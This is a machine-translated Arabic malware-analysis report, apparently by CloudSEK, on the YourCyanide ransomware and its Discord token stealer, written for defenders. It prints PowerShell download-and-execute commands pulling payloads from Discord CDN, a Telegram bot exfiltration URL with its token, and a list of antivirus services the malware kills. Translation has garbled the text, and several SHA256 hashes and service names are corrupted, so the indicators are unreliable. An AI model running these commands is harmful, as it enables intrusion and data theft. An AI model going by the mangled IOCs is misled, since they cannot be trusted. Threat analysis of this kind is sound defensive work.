YourCyanide: تحقيق في برنامج الفدية «Frankenstein» الذي يرسل رسائل حب مليئة بالبرامج الضارة

المؤلفون: أنانديشوار أونيكريشنان، ريشيكا ديساي، بينيلا سوزان جاكوب

ملخص تنفيذي

كلاود سيكمنصة مراقبة المخاطر الرقمية السياقية للذكاء الاصطناعي الجيل السادس عشر صادفت سلالة برامج الفدية المستندة إلى CMD YourCyanide التي يتم استغلالها في البرية. يستخدم YourCyanide Discord وMicrosoft Office وPastebin كجزء من آلية تنزيل الحمولة عن طريق إنشاء مرفقات Discord وطلبات عناوين URL.

يكشف تحليل تأثيرات برامج الفدية أنه يمكن استخدامها لاختراق تفاصيل الأعمال السرية والممارسات والملكية الفكرية. هناك أيضًا خطر محتمل يتمثل في الاستحواذ على عمليات الشركة أو إغلاقها مما يؤدي إلى فقدان الإيرادات والسمعة.

تتكون تدابير التخفيف من تدقيق ومراقبة سجلات الأحداث والحوادث لتحديد الأنماط والسلوكيات غير العادية. يجب أن تكون هناك آلية منهجية لفرض حماية البيانات والعودة والاسترداد. بالإضافة إلى ذلك، يجب تنفيذ تكوينات الأمان على أجهزة البنية التحتية للشبكة مثل جدار الحماية وأجهزة التوجيه.

تحليل وإسناد السيانيد الخاص بك

كلاود سيكأجرى فريق Threat Research تحقيقًا في برنامج الفدية الجديد والمتطور «YourCyanide»، والذي يتم استغلاله في البرية.

يتم توزيع سلالة برامج الفدية المستندة إلى CMD بشكل أساسي كمرفق Discord وتقوم بتقديم طلبات عناوين URL إلى Microsoft Office و Pastebin. اكتشف الباحثون في Trend Micro أن جذور YourCyanide يمكن إرجاعها إلى عائلة Gonnacope ransomware التي ظهرت لأول مرة في أبريل 2022.

 

ميزات البرامج الضارة

اكتشف فريق أبحاث التهديدات في CloudSek الميزات التالية لبرنامج الفدية YourCyanide ومشغليه:

• يتم تسليم ملف تنفيذ برامج الفدية كمرفق Discord كما هو موضح أدناه:

تسليم برامج الفدية: (كائن جديد net.webclient). تنزيل الملف («https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe»، «GetToken.exe»)

تسليم برامج الفدية: (كائن جديد net.webclient). تنزيل الملف («https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe»، «NoKeyB.exe»)

• يقوم الملف الغامض لـ YourCyanide، عند إلغاء التشويش، بإحضار الملف القابل للتنفيذ GetToken.exe.
• يقوم برنامج الفدية بتشفير الملفات وإعادة تسميتها بامتداد.cyn.
• يتم إسقاط ملف.cmd الخاص بوحدة السيانيد الخاصة بك بواسطة ملف ضار آخر CaffeJuice.exe.
• مسار مذكرة الفدية هو C:\Users\Admin\Desktop\YcynNote.txt.

• 

   

• يشارك ممثل التهديد اسمه وعنوان محفظة BTC وقناة الاتصال وعدد الملفات المشفرة في مذكرة الفدية.
• عادةً ما تطلب مجموعة برامج الفدية 500 دولار أمريكي من ضحاياها لاستعادة ملفاتهم.

الارتباط مع APT/مجموعات برامج الفدية الأخرى

• تشير عينة YourCyanide المتاحة إلى أنه يمكن أن يكون نوعًا مختلفًا من برنامج Kekpop ransomware (المعروف أيضًا باسم Kekware)؛ يسقط برنامج الفدية ملف 'other.txt' يشير إلى Kekpop. يؤكد بحثنا أيضًا أن نفس الملف القابل للتنفيذ Get.exe يُستخدم لتقديم Kekpop وYourCyanide رانسوم وير.

 

• هناك تشابه آخر يربط Kekpop و YourCyanide وهو ملف 'black.bat' الذي تم إسقاطه في كلتا الحالتين.

التحليل الفني لبرنامج الفدية YourCyanide

التنفيذ الأولي

يقوم ملف LNK الضار «powershell.exe.lnk» بتنفيذ أمر Powershell الذي يسترد الملف القابل للتنفيذ "YourCyanide.exe" من خادم Discord، وينفذه على النظام الضحية لإطلاق برنامج الفدية الخاص بك Cyanide.

 

C:\Windows\System32\WindowsPowerShell\v1.0\ powershell.exe - الأمر «(عميل Net.webclient ذو الكائن الجديد). قم بتنزيل الملف ('https://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe', 'YourCyanide.exe')»؛ ابدأ YourCyanide.exe

آلية التسليم - قطارة

يعمل الملف الثنائي الضار YourCyanide.exe، الذي تم تنزيله بواسطة ملف LNK، بمثابة أداة إسقاط لبرامج الفدية. يقوم بتنفيذ العمليات التالية على النظام:

• يقوم YourCyanide.exe بإنشاء دليل جديد «IXP000.TMP» في دليل Temp الخاص بالمستخدم.
• يقوم بتفريغ yanide.cmd الخاص بك في الدليل الذي تم إنشاؤه حديثًا. تظهر محتويات الملف في الصورة التالية.
• يقوم جهاز الإسقاط بتنفيذ البرنامج النصي الدفعي لجلب المحتويات من Pastebin وحفظها باسم yourcyanide.cmd، وهو برنامج الفدية الفعلي المكتوب في برنامج نصي دفعي.

 

• قبل الخروج، تقوم أداة الإسقاط بحذف الملف المسقط والدليل في Temp.

إصرار

• يتم تشويش شفرة برامج الفدية الرئيسية التي يتم جلبها من Pastebin بشكل كبير مع طبقات متعددة من بدائل السلاسل وتقطيعها إلى شرائح، لإعاقة تحليلها أو اكتشافها.

 

• يُظهر تحليل إضافي للشفرة غير الواضحة أن البرنامج الدفعي يحدد نظامه وسماته المخفية كما هو موضح أدناه:

 

• تقوم السمة المخفية، عند تعيينها، بإخفاء الملف المقابل من المستخدم، بينما تخدع سمة النظام نظام التشغيل للتعامل مع الملف على أنه مهم. وبالتالي، في حالة التغيير أو الحذف، تظل هذه الملفات غير متأثرة على غرار ملفات النظام.
• تحقق البرامج الضارة الثبات من خلال نقاط قابلية التوسعة للتشغيل التلقائي التالية:
  • تشغيل مفتاح التسجيل
  • مجلد بدء التشغيل

عملية التشفير

• تقوم البرامج الضارة بإنشاء قيمة جديدة «rundll32_474_toolbar» ضمن مفتاح التشغيل في السجل وتوفر اسم الملف الدفعي الضار كبيانات لإدخال التسجيل الجديد. أخيرًا، يتم حفظ نسخة من البرامج الضارة في مجلد بدء التشغيل. بمجرد أن تحقق البرامج الضارة الثبات، تقوم بإنشاء ملف دفعي جديد «AuToexEc.BAT» في محرك الأقراص C:\.
• يتكون ملف BAT من الأمر لبدء عملية جديدة من نفس نسخة البرامج الضارة. في وقت لاحق يتم تعطيل إدارة المهام من خلال التسجيل. كل هذه العمليات موضحة في الصورة أدناه.

 

• تتحقق البرامج الضارة أيضًا من وجود AUTOEXEC.BAT على نظام الضحية. وإذا تم العثور عليها، يتم استبدالها بنفسها كما هو موضح أدناه. في نظام DOS الأقدم، تم استخدام AUTOEXEC.BAT كآلية تنفيذ تلقائي، بعد تشغيل النظام.

 

• بالإضافة إلى ذلك، يقوم برنامج الفدية بالتحقق من بيئة التحليل من خلال التحقق من اسم المستخدم. جميع أسماء المستخدمين هذه مأخوذة من صناديق الحماية الشائعة على الإنترنت. تخرج البرامج الضارة من النظام إذا تطابق اسم المستخدم مع أي من أسماء المستخدمين المذكورة في الكود أدناه.

 

• يتم إسقاط ملف باسم «black.bat» في دليل المستندات الخاص بالمستخدم. تتم كتابة المحتويات ديناميكيًا في الدفعة المسقطة كما هو موضح أدناه. يقوم الملف الدفعي المسقط بتنفيذ شاشة توقف سوداء عن طريق استدعاء ملف scrnsave.scr. يؤدي تنفيذ الملف إلى جعل شاشة المستخدم فارغة.

 

الخدمات المستهدفة

تقوم البرامج الضارة بإنهاء الخدمات التالية على النظام المستهدف:

الخدمات المستهدفة

• وين ديفيند
• واوسيرف
• خدمة مراقبة جدار الحماية ضد الفيروسات من Norton
• مدير تحديث مركز الأمان في مكافي
• cmonsvc
• سي سي إس تي إم جي آر
• خدمة برامج تشغيل شبكة سيمانتيك
• خدمة وزارة الدفاع الشعبي
• يساعد/svc
• *سيمانتيك*
• سيمانتيك كور إل سي
• خدمة الحماية التلقائية من نورتون لمكافحة الفيروسات
• خادم نورتون لمكافحة الفيروسات
• ماكشيلد
• في أورت
• عميل نورتون لمكافحة الفيروسات
• جدار الحماية الشخصي PC-Cillin
• محرك McAfee.com VirusScan عبر الإنترنت في الوقت الحقيقي
• برنامج سوفوس المضاد للفيروسات
• خادم eTrust لمكافحة الفيروسات في الوقت الحقيقي
• نت ستوب netsvcs

• مركز الأمان
• تحديثات تلقائية
• خادم مكافي سبامكيلر
• سيمانتيك SPBBCsVC
• مونس سي إن تي
• CCEVTMGR
• حماية نورتون يونيرايز
• mcupdmgr.exe
• eSVC
• *مكافي*
• navapsvc
• عميل نورتون لمكافحة الفيروسات
• تنبيه NAV
• ديفواتش
• مهمة إينوتاسك
• إصدار شركة نورتون أنتيفيروس
• خدمة بروكسي تريند مايكرو
• خدمة سيجيت
• شبكة سوفوس لمكافحة الفيروسات
• جدار الحماية الشخصي Sygate Pro
• سبولنت

• سيمانتيك كور إل سي
• سافسكان
• خدمة جدار الحماية الشخصي من McAfee
• برنامج جدولة المهام Anlab
• خدمة الحماية
• خدمة الخدمة
• خدمة MSK
• برامج مكافحة التجسس من McAfee
• *نورتون
• CCPWDSVC
• سيرف-يو
• عميل سيمانتيك لمكافحة الفيروسات
• الحماية التلقائية للملاحة
• سجل الأحداث
• خدمة الحماية التلقائية ضد الفيروسات من نورتون
• المراقبة الاحترافية من ViRobot
• McShield من شركة مكافيe.com
• جدار الحماية الشخصي Sygate Pro
• خادم مهام مكافحة الفيروسات eTrust
• خادم eTrust لمكافحة الفيروسات RPC

المهام

تقوم البرامج الضارة بإنهاء العمليات الجارية التالية على النظام:

العمليات الجارية المستهدفة

• MSASCui.exe
• إكسيل
• سوء الوصول
• نظرة مستقبلية
• فايرفوكس

• أستكشف
• آي تيونز
• سفاري
• المهارات: ويندوز وورد
• سلك الجير

• MSNMSgr
• كلس
• الطلاء غير المرغوب فيه
• MSNMSgr

معالجة البيانات

بعد إنهاء العديد من خدمات الحماية وتشغيل المهام، تقوم البرامج الضارة بتأمين البيانات على النظام المستهدف كما هو موضح أدناه. يتم اجتياز الأدلة التالية والأدلة الفرعية الخاصة بها لإجراء القفل:

• سطح المكتب
• المستندات
• الموسيقى
• صور
• مقاطع فيديو
• التحميلات

 

تتم إعادة تسمية الملفات إلى رقم عشوائي تم الحصول عليه من ضرب الأرقام العشوائية، يليه ملحق «cyn». بمجرد إعادة تسمية الملفات، تتم كتابة البيانات العشوائية إلى ملف المستخدم.

تقوم البرامج الضارة بإسقاط ملف دفعي آخر باسم «2b2crypt.cmd» لقفل البيانات المتعلقة بـ Minecraft كما هو موضح أدناه. المنطق المستخدم للقفل هو نفسه كما رأينا من قبل. يتم استهداف أدلة «.minecraft» و «.minecraft\ mods» بواسطة البرامج الضارة كما هو موضح أدناه. بعد كتابة محتويات الملف الدفعي، يتم تنفيذه لبدء قفل البيانات.

 

سكربت ذا لوجر

• باستخدام Powershell، تقوم البرامج الضارة باسترداد ملف دفعي آخر «ycynlog.cmd» وتنفيذه على النظام المستهدف.

 

• يتم تشويش «ycynlog.cmd» بشكل كبير بنفس المنطق المستخدم للملف الدفعي الرئيسي لبرامج الفدية. يتم عرض التعليمات المجمعة المستضافة على Pastebin أدناه. يعمل هذا البرنامج النصي الضار كمسجل بيانات المستخدم ويرسل البيانات إلى روبوت Telegram (https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument؟ معرف الدردشة =-655682538).

 

• يبدأ البرنامج النصي ycynlog.cmd تمامًا مثل البرنامج النصي الرئيسي لبرنامج الفدية في التنفيذ عن طريق تعيين مفاتيح تشغيل التسجيل لتحقيق الثبات على النظام المستهدف وكذلك إسقاط ملف ycynlog.cmd في مجلد بدء التشغيل.
• يقوم البرنامج النصي للمسجل بتنزيل ملف تنفيذي إضافي مستضاف على ديسكورد CDN وينفذها على النظام.

احصل على الرمز الثنائي

• GetToken هو برنامج C #/.NET يستخدم لسرقة رموز Discord الخاصة بالمستخدمين. يحتوي السارق على مسارات دليل مشفرة إلى Discord والتخزين المحلي لمتصفح الويب المتنوع كما هو موضح في الصورة أدناه.

 

• يتم تحديد الرموز باستخدام مطابقة نمط Regex كما هو موضح أدناه. في حالة العثور على تطابق، يتحقق السارق من صلاحية الرمز المميز عن طريق استدعاء الوظيفة TokenUtil.checkToken.

 

• يتم تنفيذ صلاحية الرمز المميز من خلال الاتصال بخادم Discord ومراقبة استجابة الخادم. يتم عرض روتين التحقق من الرمز المميز أدناه. يتم إرجاع الرموز الصالحة إلى وظيفة المتصل.

• يقوم السارق بإنشاء ملف Tokens.txt على نظام الضحية ويقوم بتفريغ جميع الرموز الصالحة التي تم العثور عليها. في حالة عدم وجود رموز مميزة، فإن القيمة التي تتم كتابتها في Tokens.txt هي «Retard لا يحتوي على رموز». يقوم برنامج الفدية أخيرًا بإرسال Token.txt إلى روبوت Telegram.

 

• يتم استرداد عنوان IP العالمي للضحية عن طريق إرسال طلب إلى https://ipv4.wtfismyip.com/text من خلال curl ويتم تخزين الإخراج كـ IP.txt.
• يسترجع البرنامج النصي قائمة بالتطبيقات المثبتة على النظام ويخزنها في apps.txt لإرسالها لاحقًا إلى روبوت Telegram.
• يتم استخدام WMI على نطاق واسع لاسترداد معلومات مستوى النظام من المستخدم. تلخص القائمة التالية البيانات التي تم تعدادها بواسطة البرنامج النصي:
  • اسم المستخدم
  • عنوان IP (محلي)
  • بيانات تكوين الشبكة
  • معلومات MAC
  • بيانات وحدة المعالجة المركزية
  • بيانات الذاكرة الفعلية
  • معلومات القرص مثل تفاصيل القسم
  • معلومات نظام Windows
  • معلومات ترخيص Windows (مفتاح المنتج)
• يتم إرسال البيانات الواردة أعلاه مع Tokens.txt التي تم إنشاؤها بواسطة GetToken.exe إلى روبوت Telegram. بالإضافة إلى ذلك، تقوم البرامج النصية للمسجل بسرقة بيانات المستخدم الخاصة بـ Minecraft التالية:

 

• • Launcher_msa_credentials.bin
  • Launcher_msa_credentials_microsoft_store.bin
  • حسابات المشغل. json
  • مشغل_حسابات_Microsoft_store.json
  • حالة المنتجات_المشغل. json
  • ملفات تعريف المشغل. json
• باستخدام Powershell، يقوم البرنامج النصي للمسجل بتنزيل ForMe.txt من جوجل كلاود وينفذها على النظام.

 

• يقوم ForMe.exe بتفريغ البيانات إلى ForMe.txt والتي يتم دفعها لاحقًا إلى روبوت Telegram. لسوء الحظ، في وقت تحليلنا، لم يكن رابط Google Cloud يخدم الملف. يشير بحثنا إلى أنه يمكن أن يكون سارق كلمات مرور المتصفح.
• يقوم البرنامج النصي لبرنامج الفدية بعد ذلك بإسقاط ملف دفعي باسم «fuckports.cmd». تتم كتابة تعليمات إضافة قواعد جدار الحماية المخصصة في الملف الدفعي كما هو موضح أدناه. تسمح قواعد جدار الحماية التالية لحركة مرور UDP الواردة إلى المنفذ 2835 وحركة مرور UDP الصادرة من خلال 16981.

 

• تضيف البرامج الضارة نفسها إلى ملفات win.ini و system.ini. تحتوي هذه الملفات على ملفات تكوين لبدء تشغيل البرامج والإعدادات الأخرى بعد تشغيل النظام. تقوم البرامج الضارة بإسقاط ملفين دفعيين هما «confession.bat» و «Check This Out.bat» لهما أغراض متطابقة.

 

 

• YourCyanide قادر أيضًا على الانتشار عبر البريد. يستخدم واجهات برمجة تطبيقات Visual Basic للتواصل مع Microsoft Outlook ويرسل نسخة منه كمرفق بريد. ثم تقوم البرامج الضارة بإسقاط «loveletter.vbs» في دليل المستندات.
• يسترد البرنامج النصي VB قائمة عناوين المستخدم ويرسل بريدًا إلكترونيًا بعنوان «أنا معجب بك» ورسالة تنص على «اقرأني». يحتوي مرفق البريد على نسخة من برنامج الفدية الدفعي.

 

مجموعة رانسوم

• تقوم البرامج الضارة بإسقاط ملف vbs إضافي باسم «mail.vbs» بنفس المحتويات المذكورة أعلاه. ومع ذلك، سيتم إرسال بريد إلكتروني يحتوي على سطر الموضوع «Check This Out».

 

• يستخدم برنامج الفدية أمر Powershell Out-Printer لطباعة نسخ متعددة من مذكرة الفدية.

 

• تقوم البرامج الضارة أيضًا بنسخ نفسها إلى محركات أقراص أخرى موجودة على النظام كما هو موضح أدناه:

 

• والجدير بالذكر أن YouCyanide يغير ارتباط ملفات vbs و sln و js و css و ini. عند فتح هذه الملفات، يقوم النظام بنقل التحكم الخاص بها إلى برنامج مرتبط. أدرج شركاء البرامج الضارة أنواع الملفات مع أنفسهم. يتم تنفيذ البرامج الضارة عند فتح أنواع ملفات مماثلة.

 

• تعمل البرامج الضارة على تمكين سطح المكتب البعيد على النظام المستهدف كما هو موضح أدناه وتبدأ خدمة TermService أو الخدمة الطرفية المسؤولة عن التعامل مع المهام المتعلقة بـ RDP.

 

• أخيرًا، يتم عرض مذكرة الفدية للمستخدم وإنشاء تكوين التشغيل التلقائي لمحركات الأقراص المتوفرة على النظام مما يؤدي إلى تنفيذ البرامج الضارة نفسها كما هو موضح أدناه.

التأثير والتخفيف

التأثيرالتخفيف

• يمكن أن تسمح بيانات الاعتماد المسروقة بالوصول إلى شبكات المؤسسة.
• يمكن استخدام معلومات التعريف الشخصية المكشوفة (PII) لتنسيق مخططات الهندسة الاجتماعية وهجمات التصيد الاحتيالي وحتى سرقة الهوية.
• يمكن الاستفادة من بيانات الاعتماد المكشوفة للوصول إلى حسابات المستخدمين الأخرى، بسبب إعادة استخدام كلمة المرور.
• يمكن أن تكشف البيانات المكشوفة عن الممارسات التجارية والملكية الفكرية.

• استخدم معلومات التهديدات الاستباقية لمنع وتنبيه المستخدمين بالتهديدات المحتملة ولتعزيز وضع الأمان الخارجي.
• قم بإعادة تعيين بيانات اعتماد تسجيل الدخول المخترقة وتنفيذ سياسة كلمة مرور قوية لحسابات المستخدمين.
• استخدم MFA (المصادقة متعددة العوامل) عبر عمليات تسجيل الدخول.
• تحقق من الحلول الممكنة وقم بتصحيح جميع نقاط النهاية الضعيفة والقابلة للاستغلال مع إبقاء المنافذ مفتوحة.
• راقب الحالات الشاذة التي يمكن أن تكون مؤشرات لعمليات الاستحواذ المحتملة.

مؤشرات التسوية (IOCs)

شا256

• 9e973 f75c22c71c7438 bc1d4614 be11ae18e2d5140 ecc44c166b5f5102d5fbe
• c5d842735709618 ee4 f2521 c95 bf029a0690c3cbe5f7a06a916f633 eebe09 dd50
• 6A645F72ACF1D6E8C4E8B3F92C4E 4E 8B3FC92C411 BF69937 سنتيمتر مكعب FE7069 DF2CC51B8A4E
• 6 إعلانات 08 فبراير 301 حالة 18941487412E96 سب0B561 DE4482 DA 25 EA4 BB8 EEB6C1A40983
• 6ab0e2e13c32b06b9b93b1fe607a7e04a5c0ba09816 c36fba1573 a47 ed91
• f8860ce2702ديسمبر3ae1c51ff2c9a5efe0015d519ebac4c1ac0d97e73323
• 80 قدم 0 ديسيبل 9 أ 68 41 سد 62 د 7 د 5 ج 130 ف 420 بد52ب 39141097 فبا 9727034 د 1 bf3b402
• 67a1e573955304887 d30ff924eb01ba8a60a188835 d7275265 ecc716360 fb0cf
• a3523e2ba2c221593a0c16640 bfeef 8c146f747f62620 سم مكعب 2834e417578 c34c 34c
• 0ed64dd6e08e5b9c9282966 f439 ab8881b4611052838 ديسيبل 1 ef79 fc38b8a61d2
• 298 × 325 بوصة × 80 بوصة × 8 × 3 بوصة × 77 × 35 بوصة × 7 بوصة × 3 بوصة × 3 بوصة × 97 درجة مئوية × 37 بوصة × 36 بوصة × 36 درجة مئوية
• 07fab8134ff635078 الكابينة 876 ديسيبل 1e35c536936 d193a36637e0561c6efb0a85

رابط

• https://pastebin.com/raw/2K5m42Xp
• https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe
• https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument؟ معرف الدردشة =-655682538
• https://ipv4.wtfismyip.com/text

• https://doc-0k-0k-docs.googleusercontent.com/docs/securesc/hg4h2398q99ghdi837vesvkmkv3nlr6u/ai385da1543uhdsi9bioneodrj6ljsd0/1652563275000/10334864966473916138/10334864966473916138/1qubjLFibSRfpNaX8z2SkwfHMiaQGKkn5?e=download&ax=ACxEAsayVkeHdNE6Rd2bptmdqZSTVYKwRPoiFNDJuQVnig_FKMx1vCzDipGZR7IOdO-2g1gOL15FljJPButVcD1jYwAdz9PxfiRxRrf-IXEkxwIn-KYy0NfynS5Us2LkVa8lUVIgCh3AETDK76rTtUf2Yv77eLHmSWmY57tXc_sPH9QpvJSYgJ_RdbREqd4SAbnWHFihxQMttNZe7vjevvlVc0nAwXWhmoXnCdTJpoN0OOQbhl8PmoHcm03iAReIe_KnHS9uuidU_VxCPtmQU97uGRj-XxZFqfTRF5kFTSf7YukXosSBxivgSZbaXMD0fWkmh1Gw51Waxqfc5G0I_ HQPGMF3xZWIVB2FMHYN-A2NEFHWQQQ2UOVQQ2UGDQJYX4x_ehrscmfdl7TZS9U2e-cqfi

الدومين

• صندوق لصق

• Wtfismyip

• تطبيق ديسكورد

• برقية

المراجع

• ^#https://en.wikipedia.org/wiki/Traffic_Light_Protocol
• فرز
• Anyrun